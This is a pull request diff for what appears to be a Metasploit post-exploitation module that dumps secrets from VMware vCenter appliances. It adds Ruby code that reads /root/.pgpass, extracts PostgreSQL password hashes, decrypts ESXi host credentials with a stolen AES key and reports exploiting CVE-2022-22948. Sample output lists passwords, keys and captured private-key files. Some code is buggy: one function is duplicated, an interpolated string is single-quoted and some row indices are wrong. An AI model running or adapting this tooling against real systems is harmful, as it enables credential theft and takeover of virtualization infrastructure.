### PR TITLE
add database functionality to vcenter post module

### DIFF
--- a/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
+++ b/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
@@ -274,3 +274,79 @@ msf6 post(linux/gather/vcenter_secrets_dump) > dump
 [+]     AD User: sam@cesium137.io
 [+]     AD Pass: Gr33n3gg$!
 [*] Post module execution completed
+```
+
+Example run from meterpreter session on vCenter appliance version 6.7 build-18831049
+
+```
+msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
+msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
+session => 1
+msf6 post(linux/gather/vcenter_secrets_dump) > run
+[*] VMware VirtualCenter 6.7.0 build-18831049
+[*] vCenter Appliance (Embedded)
+[*] Validating target
+[*] Appliance IPv4: 2.2.2.2
+[*] Appliance Hostname: photon-machine.ragedomain
+[*] Appliance OS: VMware Photon Linux 1.0-62c543d
+[*] Gathering vSphere SSO domain information
+[+] vSphere SSO DC DN: cn=photon-machine.ragedomain,ou=Domain Controllers,dc=vsphere,dc=local
+[+] vSphere SSO DC PW: )sM8M]h,YZBQ:kY['h^(
+[*] Extracting tenant and vpx AES encryption key...
+[+] vSphere Tenant AES encryption
+[+]     KEY: ]E6"Jg7V}d{!Q:Lh
+[+]     HEX: 5d4536224a6737567d647b21513a4c68
+[+] vSphere vmware-vpx AES encryption
+[+]     HEX: ac20416a5850df52f1bf889440995871ba52984a893dbe44fd71c5c768aea3be
+[*] Extracting PostgreSQL database credentials
+[+]     VCDB Name: VCDB
+[+]     VCDB User: vc
+[+]     VCDB Pass: MB&|<)haN6Q>{K3O
+[*] Checking for VPX Users
+[-] No VPXUSER entries were found
+[*] Extract ESXi host vpxuser credentials
+[!] No ESXi hosts attached to this vCenter system
+[*] Extracting vSphere SSO domain secrets
+[*] Dumping vmdir schema to LDIF and storing to loot...
+[!] Unable to retrieve ldif contents
+WARNING:  there is already a transaction in progress
+[-] Error processing LDIF file
+[*] Extracting certificates from vSphere platform
+[+] VMCA_ROOT key: /home/h00die/.msf4/loot/20221102165124_default_2.2.2.2_vmca_523828.key
+[+] VMCA_ROOT cert: /home/h00die/.msf4/loot/20221102165124_default_2.2.2.2_vmca_694934.pem
+[+] SSO_STS_IDP key: /home/h00die/.msf4/loot/20221102165125_default_2.2.2.2_idp_031902.key
+[+] SSO_STS_IDP cert: /home/h00die/.msf4/loot/20221102165125_default_2.2.2.2_idp_256763.pem
+[+] MACHINE_SSL_CERT Key: /home/h00die/.msf4/loot/20221102165126_default_2.2.2.2___MACHINE_CERT_448485.key
+[+] MACHINE_SSL_CERT Cert: /home/h00die/.msf4/loot/20221102165126_default_2.2.2.2___MACHINE_CERT_793765.pem
+[+] MACHINE Key: /home/h00die/.msf4/loot/20221102165127_default_2.2.2.2_machine_336860.key
+[+] MACHINE Cert: /home/h00die/.msf4/loot/20221102165127_default_2.2.2.2_machine_588424.pem
+[+] VSPHERE-WEBCLIENT Key: /home/h00die/.msf4/loot/20221102165127_default_2.2.2.2_vspherewebclien_567378.key
+[+] VSPHERE-WEBCLIENT Cert: /home/h00die/.msf4/loot/20221102165127_default_2.2.2.2_vspherewebclien_997605.pem
+[+] VPXD Key: /home/h00die/.msf4/loot/20221102165128_default_2.2.2.2_vpxd_521342.key
+[+] VPXD Cert: /home/h00die/.msf4/loot/20221102165128_default_2.2.2.2_vpxd_415704.pem
+[+] VPXD-EXTENSION Key: /home/h00die/.msf4/loot/20221102165128_default_2.2.2.2_vpxdextension_152066.key
+[+] VPXD-EXTENSION Cert: /home/h00die/.msf4/loot/20221102165128_default_2.2.2.2_vpxdextension_359784.pem
+[+] DATA-ENCIPHERMENT Key: /home/h00die/.msf4/loot/20221102165129_default_2.2.2.2_dataenciphermen_517854.key
+[+] DATA-ENCIPHERMENT Cert: /home/h00die/.msf4/loot/20221102165129_default_2.2.2.2_dataenciphermen_408460.pem
+[+] SMS Key: /home/h00die/.msf4/loot/20221102165130_default_2.2.2.2_sms_self_signed_777691.key
+[+] SMS Cert: /home/h00die/.msf4/loot/20221102165130_default_2.2.2.2_sms_self_signed_215695.pem
+[*] Searching for secrets in VM Guest Customization Specification XML
+[!] No vpx_customization_spec entries evident
+[*] Retrieving .pgpass file
+[+] .pgpass creds found: replicator, BN^qgk&a)Ee2dK@| for localhost:replication
+[+] .pgpass creds found: replicator, BN^qgk&a)Ee2dK@| for 127.0.0.1:replication
+[+] .pgpass creds found: replicator, BN^qgk&a)Ee2dK@| for /var/run/vpostgres:replication
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for localhost:postgres
+[+] posgres database creds found: postgres, md5fdb13b980a01e3d1ae99b5b55b6e4303
+[+] posgres database creds found: replicator, md5c2a01981014a380b63c0c7c66ad77ba9
+[+] posgres database creds found: vc, md53b5a9fc0dd6c99567e9ca27c459b43d9
+[+] posgres database creds found: vumuser, md5fc719b1b56f02981027379fd15125feb
+[+] posgres database creds found: cns, md5d92e4534c059354dee12a7cc9a79faff
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for 127.0.0.1:postgres
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for localhost:VCDB
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for 127.0.0.1:VCDB
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for /var/run/vpostgres:VCDB
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for /var/run/vpostgres:postgres
+[+] Saving the /root/.pgpass contents to /home/h00die/.msf4/loot/20221102165131_default_2.2.2.2_.pgpass_509065.txt
+[*] Post module execution completed
+```

--- a/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
+++ b/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
@@ -312,24 +312,24 @@ msf6 post(linux/gather/vcenter_secrets_dump) > run
 WARNING:  there is already a transaction in progress
 [-] Error processing LDIF file
 [*] Extracting certificates from vSphere platform
-[+] VMCA_ROOT key: /home/h00die/.msf4/loot/20221102165124_default_2.2.2.2_vmca_523828.key
-[+] VMCA_ROOT cert: /home/h00die/.msf4/loot/20221102165124_default_2.2.2.2_vmca_694934.pem
-[+] SSO_STS_IDP key: /home/h00die/.msf4/loot/20221102165125_default_2.2.2.2_idp_031902.key
-[+] SSO_STS_IDP cert: /home/h00die/.msf4/loot/20221102165125_default_2.2.2.2_idp_256763.pem
-[+] MACHINE_SSL_CERT Key: /home/h00die/.msf4/loot/20221102165126_default_2.2.2.2___MACHINE_CERT_448485.key
-[+] MACHINE_SSL_CERT Cert: /home/h00die/.msf4/loot/20221102165126_default_2.2.2.2___MACHINE_CERT_793765.pem
-[+] MACHINE Key: /home/h00die/.msf4/loot/20221102165127_default_2.2.2.2_machine_336860.key
-[+] MACHINE Cert: /home/h00die/.msf4/loot/20221102165127_default_2.2.2.2_machine_588424.pem
-[+] VSPHERE-WEBCLIENT Key: /home/h00die/.msf4/loot/20221102165127_default_2.2.2.2_vspherewebclien_567378.key
-[+] VSPHERE-WEBCLIENT Cert: /home/h00die/.msf4/loot/20221102165127_default_2.2.2.2_vspherewebclien_997605.pem
-[+] VPXD Key: /home/h00die/.msf4/loot/20221102165128_default_2.2.2.2_vpxd_521342.key
-[+] VPXD Cert: /home/h00die/.msf4/loot/20221102165128_default_2.2.2.2_vpxd_415704.pem
-[+] VPXD-EXTENSION Key: /home/h00die/.msf4/loot/20221102165128_default_2.2.2.2_vpxdextension_152066.key
-[+] VPXD-EXTENSION Cert: /home/h00die/.msf4/loot/20221102165128_default_2.2.2.2_vpxdextension_359784.pem
-[+] DATA-ENCIPHERMENT Key: /home/h00die/.msf4/loot/20221102165129_default_2.2.2.2_dataenciphermen_517854.key
-[+] DATA-ENCIPHERMENT Cert: /home/h00die/.msf4/loot/20221102165129_default_2.2.2.2_dataenciphermen_408460.pem
-[+] SMS Key: /home/h00die/.msf4/loot/20221102165130_default_2.2.2.2_sms_self_signed_777691.key
-[+] SMS Cert: /home/h00die/.msf4/loot/20221102165130_default_2.2.2.2_sms_self_signed_215695.pem
+[+] VMCA_ROOT key: /root/.msf4/loot/20221102165124_default_2.2.2.2_vmca_523828.key
+[+] VMCA_ROOT cert: /root/.msf4/loot/20221102165124_default_2.2.2.2_vmca_694934.pem
+[+] SSO_STS_IDP key: /root/.msf4/loot/20221102165125_default_2.2.2.2_idp_031902.key
+[+] SSO_STS_IDP cert: /root/.msf4/loot/20221102165125_default_2.2.2.2_idp_256763.pem
+[+] MACHINE_SSL_CERT Key: /root/.msf4/loot/20221102165126_default_2.2.2.2___MACHINE_CERT_448485.key
+[+] MACHINE_SSL_CERT Cert: /root/.msf4/loot/20221102165126_default_2.2.2.2___MACHINE_CERT_793765.pem
+[+] MACHINE Key: /root/.msf4/loot/20221102165127_default_2.2.2.2_machine_336860.key
+[+] MACHINE Cert: /root/.msf4/loot/20221102165127_default_2.2.2.2_machine_588424.pem
+[+] VSPHERE-WEBCLIENT Key: /root/.msf4/loot/20221102165127_default_2.2.2.2_vspherewebclien_567378.key
+[+] VSPHERE-WEBCLIENT Cert: /root/.msf4/loot/20221102165127_default_2.2.2.2_vspherewebclien_997605.pem
+[+] VPXD Key: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxd_521342.key
+[+] VPXD Cert: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxd_415704.pem
+[+] VPXD-EXTENSION Key: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxdextension_152066.key
+[+] VPXD-EXTENSION Cert: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxdextension_359784.pem
+[+] DATA-ENCIPHERMENT Key: /root/.msf4/loot/20221102165129_default_2.2.2.2_dataenciphermen_517854.key
+[+] DATA-ENCIPHERMENT Cert: /root/.msf4/loot/20221102165129_default_2.2.2.2_dataenciphermen_408460.pem
+[+] SMS Key: /root/.msf4/loot/20221102165130_default_2.2.2.2_sms_self_signed_777691.key
+[+] SMS Cert: /root/.msf4/loot/20221102165130_default_2.2.2.2_sms_self_signed_215695.pem
 [*] Searching for secrets in VM Guest Customization Specification XML
 [!] No vpx_customization_spec entries evident
 [*] Retrieving .pgpass file
@@ -347,6 +347,6 @@ WARNING:  there is already a transaction in progress
 [+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for 127.0.0.1:VCDB
 [+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for /var/run/vpostgres:VCDB
 [+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for /var/run/vpostgres:postgres
-[+] Saving the /root/.pgpass contents to /home/h00die/.msf4/loot/20221102165131_default_2.2.2.2_.pgpass_509065.txt
+[+] Saving the /root/.pgpass contents to /root/.msf4/loot/20221102165131_default_2.2.2.2_.pgpass_509065.txt
 [*] Post module execution completed
 ```

--- a/lib/msf/core/post/vcenter/database.rb
+++ b/lib/msf/core/post/vcenter/database.rb
@@ -39,6 +39,8 @@ module Msf
             o['database'] = sections[2]
             o['username'] = sections[3]
             o['password'] = sections[4]
+
+            o['port'] = 5432 if o['port'] == '*'
             output.append(o)
           end
           output

--- a/lib/msf/core/post/vcenter/database.rb
+++ b/lib/msf/core/post/vcenter/database.rb
@@ -27,7 +27,7 @@ module Msf
           return nil if contents.empty?
 
           output = []
-          contents.split("\n").each do |line|
+          contents.each_line(chomp: true) do |line|
             # file format hostname:port:database:username:password
             # https://www.postgresql.org/docs/current/libpq-pgpass.html
             next unless line.include?(':') # attempt to do a little quality control
@@ -40,7 +40,7 @@ module Msf
             o['username'] = sections[3]
             o['password'] = sections[4]
 
-            o['port'] = 5432 if o['port'] == '*'
+            o['port'] = '5432' if o['port'] == '*'
             output.append(o)
           end
           output

--- a/lib/msf/core/post/vcenter/database.rb
+++ b/lib/msf/core/post/vcenter/database.rb
@@ -1,0 +1,306 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Post
+    module Vcenter
+      module Database
+        include Msf::Post::File
+
+        def pgpass_file
+          '/root/.pgpass'
+        end
+
+        def psql_bin
+          '/opt/vmware/vpostgres/current/bin/psql'
+        end
+
+        #
+        # Returns a array of hashes of the .pgpass file
+        # @param location [String] where the file is located. defaults to /root/.pgpass
+        # @return [Array] array of hashes of the file contents, nil on error
+        #
+        def process_pgpass_file(location = pgpass_file)
+          return nil unless file_exist?(location)
+
+          contents = read_file(location)
+          return nil if contents.nil?
+          return nil if contents.empty?
+
+          output = []
+          contents.split("\n").each do |line|
+            # file format hostname:port:database:username:password
+            # https://www.postgresql.org/docs/current/libpq-pgpass.html
+            next unless line.include?(':') # attempt to do a little quality control
+
+            sections = line.split(':')
+            o = {}
+            o['hostname'] = sections[0].strip
+            o['port'] = sections[1].strip
+            o['database'] = sections[2]
+            o['username'] = sections[3]
+            o['password'] = sections[4]
+            output.append(o)
+          end
+          output
+        end
+
+        #
+        # Returns a list of postgres users and password hashes from the database
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @return [Array] list of hash tables where each table is a user, nil on error
+        #
+        def query_pg_shadow_values(pg_password, vcdb_user, vcdb_name)
+          return nil unless command_exists? psql_bin
+
+          output = []
+          postgres_users = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT usename, passwd FROM pg_shadow;' -P pager -A -t")
+          return nil if postgres_users.nil?
+
+          postgres_users = postgres_users.split("\n")
+          return nil unless postgres_users.first
+
+          postgres_users.each do |postgres_user|
+            row_data = postgres_user.split('|')
+            next if row_data.length < 2 # shoudld always be 2 based on query, but this will catch 'command not found' or other things like that
+
+            user = {
+              'user' => row_data[0],
+              'password_hash' => row_data[1]
+            }
+
+            output.append(user)
+          end
+          output
+        end
+
+        #
+        # Returns a list of postgres users and password hashes from the database
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @return [Array] list of hash tables where each table is a user, nil on error
+        #
+        def query_pg_shadow_values(pg_password, vcdb_user, vcdb_name)
+          return nil unless command_exists? psql_bin
+
+          output = []
+          postgres_users = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT usename, passwd FROM pg_shadow;' -P pager -A -t")
+          return nil if postgres_users.nil?
+
+          postgres_users = postgres_users.split("\n")
+          return nil unless postgres_users.first
+
+          postgres_users.each do |postgres_user|
+            row_data = postgres_user.split('|')
+            next if row_data.length < 2 # shoudld always be 2 based on query, but this will catch 'command not found' or other things like that
+
+            user = {
+              'user' => row_data[0],
+              'password_hash' => row_data[1]
+            }
+
+            output.append(user)
+          end
+          output
+        end
+
+        #
+        # Returns a list of vpx users and password hashes from the database
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @param symkey [String] string of they symkey
+        # @return [Array] list of hash tables where each table is a user, nil on error
+        #
+        def query_vpx_creds(pg_password, vcdb_user, vcdb_name, symkey = nil)
+          return nil unless command_exists? psql_bin
+
+          output = []
+          vpx_creds = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT user_name, password, local_ip_address, ip_address, dns_name FROM VPX_HOST;' -P pager -A -t")
+          return nil if vpx_creds.nil?
+
+          vpx_creds = vpx_creds.split("\n")
+          return nil unless vpx_creds.first
+
+          vpx_creds.each do |vpx_user|
+            row_data = vpx_user.split('|')
+            next if row_data.length < 2 # shoudld always be 2 based on query, but this will catch 'command not found' or other things like that
+
+            user = {
+              'user' => row_data[0],
+              'encrypted_password' => row_data[1],
+              'local_ip' => row_data[2],
+              'ip_address' => row_data[3],
+              'dns_name' => row_data[4]
+            }
+            unless symkey.nil?
+              # https://github.com/shmilylty/vhost_password_decrypt/blob/main/decrypt.py
+              # https://pentera.io/blog/information-disclosure-in-vmware-vcenter/
+              encrypted_password = row_data[1].gsub('*', '').strip
+              encrypted_password = Base64.decode64(encrypted_password)
+              encrypted_password = encrypted_password.scan(/.{16}/)
+
+              iv = encrypted_password.shift
+              encrypted_password = encrypted_password.join
+              begin
+                cipher = OpenSSL::Cipher.new('aes-256-cbc')
+                cipher.decrypt
+                cipher.key = [symkey.strip].pack('H*')
+                cipher.iv = iv
+                user['decrypted_password'] = cipher.update(encrypted_password) + cipher.final
+              rescue OpenSSL::Cipher::CipherError => e
+                vprint_error("Unable to decrypt password for #{user} due to OpenSSL Cipher Error: #{e}")
+              end
+            end
+
+            output.append(user)
+          end
+          output
+        end
+
+        #
+        # A helper function to return the command line statement string to connect to the postgress server
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @param vcdb_host [String] virtual center hostname. Defaults to 'localhost'
+        # @return [String] a string to run on command line
+        #
+        def postgress_connect(pg_password, vcdb_user, vcdb_name, vcdb_host = 'localhost')
+          # should come in wrapped in quotes, but if not wrap
+          unless pg_password.start_with?("'") && pg_password.end_with?("'")
+            pg_password = "'#{pg_password}'"
+          end
+          "PGPASSWORD=#{pg_password} #{psql_bin} -h '#{vcdb_host}' -U '#{vcdb_user}' -d '#{vcdb_name}'"
+        end
+
+        #
+        # Returns a list of vpc customization contents
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @return [Hash] where the customization name is the key and value is the parsed xml doc, nil on error
+        #
+        def get_vpx_customization_spec(pg_password, vcdb_user, vcdb_name)
+          return nil unless command_exists? psql_bin
+
+          output = {}
+          vpx_customization_specs = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT DISTINCT name FROM vc.vpx_customization_spec;' -P pager -A -t")
+          return nil if vpx_customization_specs.nil?
+
+          vpx_customization_specs = vpx_customization_specs.split("\n")
+          return nil unless vpx_customization_specs.first
+
+          vpx_customization_specs.each do |spec|
+            xml = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c \"SELECT body FROM vpx_customization_spec WHERE name = '#{spec}\';\" -P pager -A -t").to_s.strip.gsub("\r\n", '').gsub("\n", '').gsub(/>\s*/, '>').gsub(/\s*</, '<')
+            next if xml.nil?
+
+            begin
+              xmldoc = Nokogiri::XML(xml) do |config|
+                config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
+              end
+            rescue Nokogiri::XML::SyntaxError
+              print_bad("Unable to read XML from #{spec}")
+              next
+            end
+            output[spec] = xmldoc
+          end
+          output
+        end
+
+        #
+        # Returns a list of virtual machines located on the server
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @param vc_sym_key [String] sym key from virtual center
+        # @return [Array] list of hash tables where each table is a user, nil on error
+        #
+        def get_vpx_vms(pg_password, vcdb_user, vcdb_name, _vc_sym_key)
+          return nil unless command_exists? psql_bin
+
+          output = []
+          vm_rows = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT vmid, name, configfilename, guest_state, is_template FROM vpxv_vms;' -P pager -A -t")
+          return nil if vm_rows.nil?
+
+          vm_rows = vm_rows.split("\n")
+          return nil unless vm_rows.first
+
+          vm_rows.each do |vm_row|
+            row_data = vm_row.split('|')
+            next if row_data.length < 5 # shoudld always be 5 based on query, but this will catch 'command not found' or other things like that
+
+            vm = {
+              'vmid' => row_data[0],
+              'name' => row_data[1],
+              'configfilename' => row_data[3],
+              'guest_state' => row_data[4],
+              'is_template' => row_data[5]
+            }
+            output.append(vm)
+          end
+          output
+        end
+
+        #
+        # Returns a list of vpc customization contents
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @param vc_sym_key [String] sym key from virtual center
+        # @return [Array] list of hash tables where each table is a user, nil on error
+        #
+        def get_vpx_users(pg_password, vcdb_user, vcdb_name, vc_sym_key)
+          return nil unless command_exists? psql_bin
+
+          output = []
+          vpxuser_rows = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT dns_name, ip_address, user_name, password FROM vc.vpx_host ORDER BY dns_name ASC;' -P pager -A -t")
+          return nil if vpxuser_rows.nil?
+
+          vpxuser_rows = vpxuser_rows.split("\n")
+          return nil unless vpxuser_rows.first
+
+          vpxuser_rows.each do |vpxuser_row|
+            row_data = vpxuser_row.split('|')
+            next if row_data.length < 4 # shoudld always be 4 based on query, but this will catch 'command not found' or other things like that
+
+            user = {
+              'fqdn' => row_data[0],
+              'ip' => row_data[1],
+              'user' => row_data[2]
+            }
+
+            vpxuser_secret_b64 = row_data[3].gsub('*', '')
+            user['password'] = vpx_aes_decrypt(vpxuser_secret_b64, vc_sym_key).gsub('\"', '"')
+            output.append(user)
+          end
+          output
+        end
+
+        #
+        # helper function to decrypt passwords stored in the pg database
+        # @param b64 [String] base64 string of the password exported from postgres
+        # @param vc_sym_key [String] sym key from virtual center
+        # @return [String] the decrypted password, nil on error
+
+        def vpx_aes_decrypt(b64, vc_sym_key)
+          # https://www.pentera.io/wp-content/uploads/2022/03/Sensitive-Information-Disclosure_VMware-vCenter_f.pdf
+          secret_bytes = Base64.strict_decode64(b64)
+          iv = secret_bytes[0, 16]
+          ciphertext = secret_bytes[16, 64]
+          decipher = OpenSSL::Cipher.new('aes-256-cbc')
+          decipher.decrypt
+          decipher.iv = iv
+          decipher.padding = 1
+          decipher.key = vc_sym_key
+          return (decipher.update(ciphertext) + decipher.final).delete("\000")
+        rescue StandardError => e
+          elog('Error performing vpx_aes_decrypt', error: e)
+          ''
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/post/vcenter/vcenter.rb
+++ b/lib/msf/core/post/vcenter/vcenter.rb
@@ -367,7 +367,7 @@ module Msf
             print_good('Exploited CVE-2022-22948 to read #{vcd_properties_file}')
           end
           output = {}
-          contents.split("\n").each do |line|
+          contents.each_line(chomp: true) do |line|
             next unless line.include?('=') # attempt to do a little quality control
 
             line = line.split('=')

--- a/lib/msf/core/post/vcenter/vcenter.rb
+++ b/lib/msf/core/post/vcenter/vcenter.rb
@@ -5,6 +5,7 @@ module Msf
     module Vcenter
       module Vcenter
         include Msf::Post::File
+        include Msf::Post::Linux::Priv
 
         def manifest_file
           '/opt/vmware/etc/appliance-manifest.xml'

--- a/lib/msf/core/post/vcenter/vcenter.rb
+++ b/lib/msf/core/post/vcenter/vcenter.rb
@@ -363,6 +363,9 @@ module Msf
           contents = read_file(location)
           return nil if contents.nil?
 
+          if location == vcd_properties_file && is_root? == false
+            print_good('Exploited CVE-2022-22948 to read #{vcd_properties_file}')
+          end
           output = {}
           contents.split("\n").each do |line|
             next unless line.include?('=') # attempt to do a little quality control

--- a/lib/msf/core/post/vcenter/vcenter.rb
+++ b/lib/msf/core/post/vcenter/vcenter.rb
@@ -46,6 +46,10 @@ module Msf
           '/opt/vmware/vpostgres/current/bin/psql'
         end
 
+        def vcd_properties_file
+          '/etc/vmware-vpx/vcdb.properties'
+        end
+
         #
         # Function to determine if a string is a valid FQDN or not
         # @param fqdn [String] the string to check if it is a valid FQDN or not
@@ -349,152 +353,11 @@ module Msf
         end
 
         #
-        # A helper function to return the command line statement string to connect to the postgress server
-        # @param pg_password [String] postgress password
-        # @param vcdb_user [String] virtual center database username
-        # @param vcdb_name [String] virtual center database name
-        # @param vcdb_host [String] virtual center hostname. Defaults to 'localhost'
-        # @return [String] a string to run on command line
-        #
-        def postgress_connect(pg_password, vcdb_user, vcdb_name, vcdb_host = 'localhost')
-          # should come in wrapped in quotes, but if not wrap
-          unless pg_password.start_with?("'") && pg_password.end_with?("'")
-            pg_password = "'#{pg_password}'"
-          end
-          "PGPASSWORD=#{pg_password} #{psql_bin} -h '#{vcdb_host}' -U '#{vcdb_user}' -d '#{vcdb_name}'"
-        end
-
-        #
-        # Returns a list of vpc customization contents
-        # @param pg_password [String] postgress password
-        # @param vcdb_user [String] virtual center database username
-        # @param vcdb_name [String] virtual center database name
-        # @return [Hash] where the customization name is the key and value is the parsed xml doc, nil on error
-        #
-        def get_vpx_customization_spec(pg_password, vcdb_user, vcdb_name)
-          return nil unless command_exists? psql_bin
-
-          output = {}
-          vpx_customization_specs = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT DISTINCT name FROM vc.vpx_customization_spec;' -P pager -A -t")
-          return nil if vpx_customization_specs.nil?
-
-          vpx_customization_specs = vpx_customization_specs.split("\n")
-          return nil unless vpx_customization_specs.first
-
-          vpx_customization_specs.each do |spec|
-            xml = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c \"SELECT body FROM vpx_customization_spec WHERE name = '#{spec}\';\" -P pager -A -t").to_s.strip.gsub("\r\n", '').gsub("\n", '').gsub(/>\s*/, '>').gsub(/\s*</, '<')
-            next if xml.nil?
-
-            begin
-              xmldoc = Nokogiri::XML(xml) do |config|
-                config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
-              end
-            rescue Nokogiri::XML::SyntaxError
-              print_bad("Unable to read XML from #{spec}")
-              next
-            end
-            output[spec] = xmldoc
-          end
-          output
-        end
-
-        #
-        # helper function to decrypt passwords stored in the pg database
-        # @param b64 [String] base64 string of the password exported from postgres
-        # @param vc_sym_key [String] sym key from virtual center
-        # @return [String] the decrypted password, nil on error
-
-        def vpx_aes_decrypt(b64, vc_sym_key)
-          # https://www.pentera.io/wp-content/uploads/2022/03/Sensitive-Information-Disclosure_VMware-vCenter_f.pdf
-          secret_bytes = Base64.strict_decode64(b64)
-          iv = secret_bytes[0, 16]
-          ciphertext = secret_bytes[16, 64]
-          decipher = OpenSSL::Cipher.new('aes-256-cbc')
-          decipher.decrypt
-          decipher.iv = iv
-          decipher.padding = 1
-          decipher.key = vc_sym_key
-          return (decipher.update(ciphertext) + decipher.final).delete("\000")
-        rescue StandardError => e
-          elog('Error performing vpx_aes_decrypt', error: e)
-          ''
-        end
-
-        #
-        # Returns a list of vpc customization contents
-        # @param pg_password [String] postgress password
-        # @param vcdb_user [String] virtual center database username
-        # @param vcdb_name [String] virtual center database name
-        # @param vc_sym_key [String] sym key from virtual center
-        # @return [Array] list of hash tables where each table is a user, nil on error
-        #
-        def get_vpx_users(pg_password, vcdb_user, vcdb_name, vc_sym_key)
-          return nil unless command_exists? psql_bin
-
-          output = []
-          vpxuser_rows = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT dns_name, ip_address, user_name, password FROM vc.vpx_host ORDER BY dns_name ASC;' -P pager -A -t")
-          return nil if vpxuser_rows.nil?
-
-          vpxuser_rows = vpxuser_rows.split("\n")
-          return nil unless vpxuser_rows.first
-
-          vpxuser_rows.each do |vpxuser_row|
-            row_data = vpxuser_row.split('|')
-            next if row_data.length < 4 # shoudld always be 4 based on query, but this will catch 'command not found' or other things like that
-
-            user = {
-              'fqdn' => row_data[0],
-              'ip' => row_data[1],
-              'user' => row_data[2]
-            }
-
-            vpxuser_secret_b64 = row_data[3].gsub('*', '')
-            user['password'] = vpx_aes_decrypt(vpxuser_secret_b64, vc_sym_key).gsub('\"', '"')
-            output.append(user)
-          end
-          output
-        end
-
-        #
-        # Returns a list of virtual machines located on the server
-        # @param pg_password [String] postgress password
-        # @param vcdb_user [String] virtual center database username
-        # @param vcdb_name [String] virtual center database name
-        # @param vc_sym_key [String] sym key from virtual center
-        # @return [Array] list of hash tables where each table is a user, nil on error
-        #
-        def get_vpx_vms(pg_password, vcdb_user, vcdb_name, _vc_sym_key)
-          return nil unless command_exists? psql_bin
-
-          output = []
-          vm_rows = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT vmid, name, configfilename, guest_state, is_template FROM vpxv_vms;' -P pager -A -t")
-          return nil if vm_rows.nil?
-
-          vm_rows = vm_rows.split("\n")
-          return nil unless vm_rows.first
-
-          vm_rows.each do |vm_row|
-            row_data = vm_row.split('|')
-            next if row_data.length < 5 # shoudld always be 5 based on query, but this will catch 'command not found' or other things like that
-
-            vm = {
-              'vmid' => row_data[0],
-              'name' => row_data[1],
-              'configfilename' => row_data[3],
-              'guest_state' => row_data[4],
-              'is_template' => row_data[5]
-            }
-            output.append(vm)
-          end
-          output
-        end
-
-        #
         # Returns a hash table of the vcdb.properties file
         # @param location [String] where the file is located. defaults to /etc/vmware-vpx/vcdb.properties
         # @return [Hash] hash of the file contents, nil on error
         #
-        def process_vcdb_properties_file(location = '/etc/vmware-vpx/vcdb.properties')
+        def process_vcdb_properties_file(location = vcd_properties_file)
           return nil unless file_exist?(location)
 
           contents = read_file(location)

--- a/modules/post/linux/gather/vcenter_secrets_dump.rb
+++ b/modules/post/linux/gather/vcenter_secrets_dump.rb
@@ -37,9 +37,9 @@ class MetasploitModule < Msf::Post
           sign forged SAML assertions for the /ui admin interface.
         },
         'Author' => [
-         'npm[at]cesium137.io', # original vcenter secrets dump
-         'Erik Wynter', # @wyntererik, postgres additions
-         'h00die' # tying it all together
+          'npm[at]cesium137.io', # original vcenter secrets dump
+          'Erik Wynter', # @wyntererik, postgres additions
+          'h00die' # tying it all together
         ],
         'Platform' => [ 'linux', 'unix' ],
         'DisclosureDate' => '2022-04-15',
@@ -54,12 +54,16 @@ class MetasploitModule < Msf::Post
           ]
         ],
         'DefaultAction' => 'Dump',
+        'References' => [
+          [ 'URL', 'https://github.com/shmilylty/vhost_password_decrypt' ],
+          [ 'CVE', '2022-22948' ],
+          [ 'URL', 'https://pentera.io/blog/information-disclosure-in-vmware-vcenter/' ],
+        ],
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
-          'Reliability' => [ REPEATABLE_SESSION ],
